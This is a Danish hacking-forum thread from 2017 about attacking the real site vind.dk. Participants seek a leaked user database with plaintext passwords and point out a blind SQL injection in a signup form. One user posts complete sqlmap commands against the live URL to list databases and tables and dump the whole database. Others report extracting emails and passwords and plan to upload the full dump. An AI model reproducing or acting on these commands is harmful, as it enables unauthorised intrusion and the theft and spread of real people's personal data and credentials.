vind.dk er hacket?
|
04-07-2017, 09:38
|
|||
|
|||
vind.dk er hacket?
Hey
Jeg har hørt at vind.dk er hacket via SQLi og at databasen med over 1000 brugere med mail og kode i klar tekst er lækket et sted. Men jeg kan ikke finde den. Nogen der har hørt noget, eller har set hvor den ligger? |
|||
04-07-2017, 10:18
|
|||
|
|||
RE: vind.dk er hacket?
nu ved jeg ikke om du går efter noget specifikt.. men der er store danske sider som er hacket, nogle af brugerne herinde ligger inde med hundredetusindevis af danske mail+pw i klartekst.
how the
|
|||
05-07-2017, 01:53
|
|||
|
|||
RE: vind.dk er hacket?
Du kan selv tage databasen eller eventuelt få nogen til det.
http://www.vind.dk/Den_Store_RejseQuiz/V...signup.asp Der er Blind SQLi på POST input email |
|||
05-07-2017, 13:03
(Denne besked var sidst ændret: 09-07-2017, 15:56 af TheHacker.)
|
|||
|
|||
RE: vind.dk er hacket?
OPS!
Dette er kun fremgangsmåden! Jeg anbefaler ALDRIG at prøve selv, medmindre du er 100% sikker på, at du har en bulletproof server (05-07-2017, 01:53)Kopa Skrev: Du kan selv tage databasen eller eventuelt få nogen til det. Mener du ikke på postnummeret? Nå, send mig en PB. Jeg har databasen, Niklas. Så kan jeg evt. også vise dig, hvordan du gør. Efter jeg modtog en PB, forklarede jeg godt og grundigt, hvordan jeg gjorde. Her er min metode: Tricket er, at have SQLmap også køre følgende kommando: sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --dbs --threads 6 Kode: -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" Kode: --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" En normal burp suite intercept request (bare en html request) ser sådan her ud: Kode: POST /Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp HTTP/1.1 Kode: -p "zip" Kode: --dbs --threads 10 Hvis vi nu vil grave ind i en database, så kan vi gøre det på denne måde: Kode: sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" -D vinddk --tables Vælger jeg nu, at jeg gerne vil hente hele databasen ned (ikke kun en tabel, men HELE databasen), så skriver jeg: Kode: sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --dump --threads 10 Kode: sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --tables -D vinddk --dump --threads 10 Du kan google dig frem til flere sqlmap tutorials på nettet :) eller blot spørge her. Det tog lidt længere tid end forventet at svare. Jeg håber du kunne bruge mit svar. - TheHacker
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
06-07-2017, 11:17
(Denne besked var sidst ændret: 06-07-2017, 11:27 af TheHacker.)
|
|||
|
|||
RE: vind.dk er hacket?
Hvilken kommando kører du?
Kode: it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y Det er dem, jeg skrev ind^^ Ellers formindsk "--threads"
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
06-07-2017, 12:00
|
|||
|
|||
RE: vind.dk er hacket?
Perfekt :)
De har meget chunk... men en masse emails med adresser. De har vist også nogle koder.
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
06-07-2017, 12:18
|
|||
|
|||
RE: vind.dk er hacket?
(06-07-2017, 12:02)BKK187 Skrev: Jeg laver en dump-all så kan jeg lige uploade den når den færdig engang. Held og lykke. Den kommer nok til at køre... i lidt tid.
Kontakt mig, hvis du har brug for hjælp til noget!
|
|||
|
User(s) browsing this thread: 1 Gæst(er)